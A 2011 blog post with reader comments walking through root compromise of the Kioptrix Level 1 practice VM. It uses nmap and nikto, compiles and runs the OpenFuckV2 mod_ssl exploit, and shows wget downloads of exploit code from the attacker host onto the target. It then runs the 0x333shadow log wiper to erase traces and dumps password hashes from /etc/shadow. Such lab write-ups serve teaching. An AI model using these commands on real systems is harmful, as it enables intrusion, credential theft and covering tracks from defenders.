2011-02-11

[Video] Kioptrix - Level 1 (mod_ssl)

Links
Watch video on-line: http://g0tmi1k.blip.tv/file/4845917/
Download video: http://www.mediafire.com/?r3327dt3re397hb





Brief Overview
Kioptrix is another “Vulnerable-By-Design OS” (like De-ICE, Metasploitable and pWnOS), with the aim to go from "boot" to "root" by any mean possible. This video demonstrates a well-known out-of-date issue in "mod_ssl". Because it wasn't too complex, I extended the video by removing the attacker from some log files.



Method
    * Scan network for hosts (nmap)
    * Scan target for running services (nmap)
    * Scan target for running web services (nikto)
    * Discover and run exploit (OpenFuckV2)
    * Gain root (OpenFuckV2)
    * Game Over
    * Modify logs (0x333shadow)



What do I need?
    * Kioptrix - Level 1 VM. Download here (Mirror: Part 1 MD5:4F08E9FD3C4C1A4D85D0E9E79FC3A44D, Part 2 MD5:D8DB6CE65652880327B92150B08106EA)
    * VMware player OR workstation. Download here
    * nmap – (Can be found on BackTrack 4-R2). Download here
    * nikto - (Can be found on BackTrack 4-R2)
    * Internet Browser – (Firefox can be found on BackTrack 4-R2)
    * A Text Editor – (Kate can be found on BackTrack 4-R2)
    * OpenFuckv2.c – (Can be found on exploit-db.com)
    * ptrace/kmod local root exploit – (Can be found on securityfocus.com
    * 0x333shadow.tar – (Can be found on packetstormsecurity.org)



Walkthrough
A quick general nmap scan shows what host are on the network currently, before doing a more detailed scan on the target (192.168.0.111). By doing this, nmap shows what possible services (ports) the target has running and the version of the service and then attempts to identify the operating system (OS). The result of this are:
    * OS: Linux v2.4.x (2.4.9-18)
    * Web Server: Apache httpd 1.3.20 ((Unix) (Red-hat/Linux)) mod_ssl 2.8.4/OpenSSL 0.9.6b

The next stage was to use nikto to allow the attacker to detect what vulnerability(s) were being run on the web server. Nikto identities that the version of mod_ssl is "vulnerable to a remote buffer overflow which may allow a remote shell" [CVE-2002-0082, OSVDB-756].

The attacker then searches an exploit database (exploit-db.com), which return a couple of exploits. The chosen exploit was labelled as "OpenFuckV2.c".

The exploit needed to be modified to compile on the attackers computer due to updated library files for OpenSSL, as well as updating the link for the privilege escalation exploit.

After the exploit has been compiled, the attacker looks up the details on the targets environment (from the nmap and nikto scans before) and runs the exploit. After which, not only has the attacker successfully gained a remote shell, the attacker also has "root" access on the targets system.

As the exploit targets “mod_ssl”, it inherits the same privilege as the user which is running the service (in this case “apache”). If the current privilege isn't enough for the attacker to reach their goal then they must use privilege elevation attacks to gain further access to the system. In most cases, the targeted account would be the highest user, “root”. This would allow the attacker to control anything on the target's system.

Once the attacker has a remote shell, the next few commands check the objective (which is displayed on the login screen locally) and the local environment as well as the password file.

The attacker has been using their machine directly, as well as hosting all the necessary files on their machine, therefore, to attempt to cover their traces they remove their IP address from various locations. This is done by using a program called "0x333shadow".

The attacker runs 0x333shadow which removes traces of the attackers IP in all default log directories, binary files (utmp, wtmp, utmpx, wtmpx, lastlog) as well as scanning “syslog” and “newsyslog” to try and detect other log locations. The attacker commands 0x333shadow to remove the logs after 5 seconds of running the 0x333shadow, allowing them to remove all traces of the program itself.



Commands 
nmap 192.168.0.0/24 -n -sP -sn 
nmap 192.168.0.111 -O -sS -sV -v 
clear 

cd /pentest/scanners/nikto 
./nikto.pl -host 192.168.0.111 -Display 124 

Firefox: Search (exploit.db): OpenSSL -> Download 
#http://www.exploit-db.com/exploits/764/">http://www.exploit-db.com/exploits/764/ 

cd ~ 
gcc 764.c -o exploit -lcrypto 
kate 764.c 
-> Add: #include <openssl rc4.h> 
-> Add: #include <openssl md5.h> 
Firefox: Search (Google): ptrace-kmod.c. Download: http://downloads.securityfocus.com/vulnerabilities/exploits/ptrace-kmod.c 
cp ptrace-kmod.c /var/www/ 
start-apache 
-> Replace: wget 192.168.0.33/ptrace-kmod.c 
-> Save 
gcc 764.c -o exploit -lcrypto 
ls 
./exploit 
./exploit 0x6b 192.168.0.111 443 

uname -a 
#cat /etc/*-release 
whoami 
cat /etc/issue 
mail 
1 
exit 

cat /etc/shadow 

cd /var/log && grep -r 192.168.0.33 ./ 
* Firefox: Google -> Search: 0x333shadow.tar.gz. Download: http://dl.packetstormsecurity.net/UNIX/penetration/log-wipers/0x333shadow.tar.gz 
* tar xvf 0x333shadow.tar.gz 
* cd 0x333shadow 
* ls 
* cp 0x333shadow.c /var/www/rmLogs.c 
cd /tmp 
wget 192.168.0.33/rmLogs.c 
gcc 0x333shadow.c -o rmLogs -D Linux 
ls 
./rmLogs 
./rmLogs -a -i 192.168.0.33 -l 5 && rm -rf * 
cd /var/log && grep -r 192.168.0.33 ./ 
locate .bash_history 
cat /home/john/.bash_history 
cat /root/.bash_history 

uname -a && whoami 

#--------------------------------------------------------------------- 
root:$1$XROmcfDX$tF93GqnLHOJeGRHpaNyIs0:14513:0:99999:7::: 
john:$1$zL4.MR4t$26N4YpTGceBO0gTX6TAky1:14513:0:99999:7::: 
harold:$1$Xx6dZdOd$IMOGACl3r757dv17LZ9010:14513:0:99999:7::: 
#---------------------------------------------------------------------

Notes
    * This is a well-known old vulnerability, and has a few different variations on the exploit.
    * OpenFuckV2.c (which uses "ptrace-kmod.c") might not gain "root" if the target doesn't have gcc installed or not using a vulnerable kernel version.
    * The attacker may be logged by another service, which 0x333shadow might not remove.
    * Just because the logs have been deleted, doesn't mean you have covered all traces. For example, forensics tools can recover deleted files.
    * As the target only communicates with attacker, instead of using a 3rd party, it helps simplify with removing logs.

Song: Rocco – Everyone 9.0 (Single Mix) & Kompulsor – Around the World (La La La La) (Single Edit)
Video length: 06:22
Capture length: 19:31
Blog Post: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-1-modssl.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38314-%5Bvideo%5D-kioptrix-level-1-mod_ssl.html#post190751



~g0tmi1k
Posted by g0tmi1k at 15:39
Labels: , ,

17 comments:

  1. Hi, I have tried this with Kioptrix VM Level 1 and am having no success with the OpenFuckV2 exploit. Shouldn't this exploit work as it is the same VM? It reaches the same point as you in the video (Spawning Shell...) and then says "Good Bye...", instead of spawning a shell and downloading ptrace-kmod.c. Any ideas as to why it is failing to exploit? Thanks.

    ReplyDelete

  2. @gorara
    What do you mean by "Same VM"? How are you running Backtrack and Kioptrix ?
    What mode/setting is the network set to as well?

    ReplyDelete

  3. Hi, I meant "same VM" as in the same VM you are running: Kioptrix VM Level 1. I am running backtrack 4 r2, and Kioptrix VM Level 1 in a Virtualbox VM. The Kioptrix box is set to bridged networking. I was having trouble getting the exploit to work, but finally did in the end. Although I had to run it quite a few times before it succeeded. Is it usual for this exploit to fail a few times before working?

    ReplyDelete

  4. @gorara
    I've seen the exploit you mentioned behave that way. So I guess it could be considered normal...

    ReplyDelete

  5. @g0tmi1k .... thanks for taking the time to put this together ... i am going to go for the mod_ssl exploit this evening ... however, I was also successful in finding a legitimate samba 2.2.1a exploit in metasploit ... it kicked back a remote shell with root privileges rather quick ... I will post the exact exploit and payload later today .. on to level 2! .. thanks again for the exercise.

    ReplyDelete

  6. @gorara It is because of the address space randomization. Check in your bt machine for /proc/sys/kernel/randomize_va_space
    It should be set to 0.

    ReplyDelete

  7. @gorara
    Im glad that you got it working. =)
    Personally I've only used that exploit for this system - and I didn't have any issues (or don't remember of any!).


    @loneferret
    Thats good to know! =)
    I will make a note of this in the post.


    @p.j. hartlieb
    Thanks for the thanks! =)
    Yeah - I also found the same method & did a video on it here: http://g0tmi1k.blogspot.com/2011/03/video-kioptrix-level-1-samba.html
    Level 2 was really fun! How are/did you find it?
    This project belongs to loneferret, however I'm glad you enjoyed it! =D


    @adityagujar
    Thanks for the heads up! =D

    ReplyDelete

  8. Hi!
    Im using BackTrack 5 with Kioptrix.. Im getting some errors when i try to run: gcc 764.c -o exploit -lcrypto

    It says it dont find openssl somehow.
    openssl



    Would to like to know what im doing wrong here..
    Thanks for the tutorial!

    ReplyDelete

  9. Here is the output error i get: http://pastebin.com/DF4e45se

    Ive also dont have a ./exploit to run.

    Im pretty new to this, so would be great if anyone one could tell me what im doing wrong here. Ive also has the latest Kioptrix running.

    Thanks!

    ReplyDelete

  10. @g0tmi1k ... finishing up level 2 now ... looking for a way to escalate my privileges ... dumped the DB but there are no damn credentials for ssh :( .. i was hoping that they would be lazier ;) ... this one is a great puzzle ...learned a lot ... hardest thing is finding time to work it when the family goes to bed ... thanks again.

    ReplyDelete

  11. @hejsanheterjag
    BackTrack 5 might have updated the libraries - which could cause the error...
    Did you update and modify the exploit:
    e.g. -> Add: "#include " & "#include " like in the video?

    Its not compiling correctly, which is what the error messages are saying, which is why you dont have any output (./exploit)


    @p.j. hartlieb
    I have done another blog post on level 2: http://g0tmi1k.blogspot.com/2011/02/video-kioptrix-level-2-injection.html
    Here is a hint: The database is a dead end (as you found out). Somewhere doesn't check the input too well which allows commands be executed...
    That's the aim of boo2roots - is for you to learn and try things out - its great to hear that you have =)
    I hope you crack it soon (and there is now another one after it) And credit to the author of it,
    http://kioptrix.com/

    ReplyDelete

  12. hi cool video. btw, what is name of widget name that shows cpu, mem, top5 procc ...etc.

    ReplyDelete

  13. @rEa
    Thanks for the thanks.

    conky (with a edited template)

    ReplyDelete

  14. how can i modify and update the exploit plz i don't understand

    ReplyDelete

  15. hi,
    tkx for this demo... Is there a version for apache 2.x.x? (2.2.11 for me)

    ReplyDelete

  16. @DevC0derz
    You need to use a text editor (which ever you like, geany, kate, gedit, nano, vi etc etc) and then add in:
    #include
    #include
    *Just like in the video @ 1:50* =)



    @pierre news
    Looking at the exploit source code, no.

    ReplyDelete

  17. Nmap got this:

    8443/tcp open ssl/http Apache httpd 2.0.46 ((Red Hat) mod_ssl/2.0.46 OpenSSL/0.9.7a)
    Service Info: Host: localhost.localdomain; OSs: Unix, Linux


    So i need to used this right?:

    sudo ./exploit 0x78 X.X.X.X 8443


    Because:
    0x78 - RedHat Linux 8.0 (apache-2.0.40)


    And i got this:

    Establishing SSL connection
    get server hello: Remote server does not support 128 bit RC4


    So can you help me? (And i love the music!!!)

    ReplyDelete

Subscribe to: Post Comments (Atom)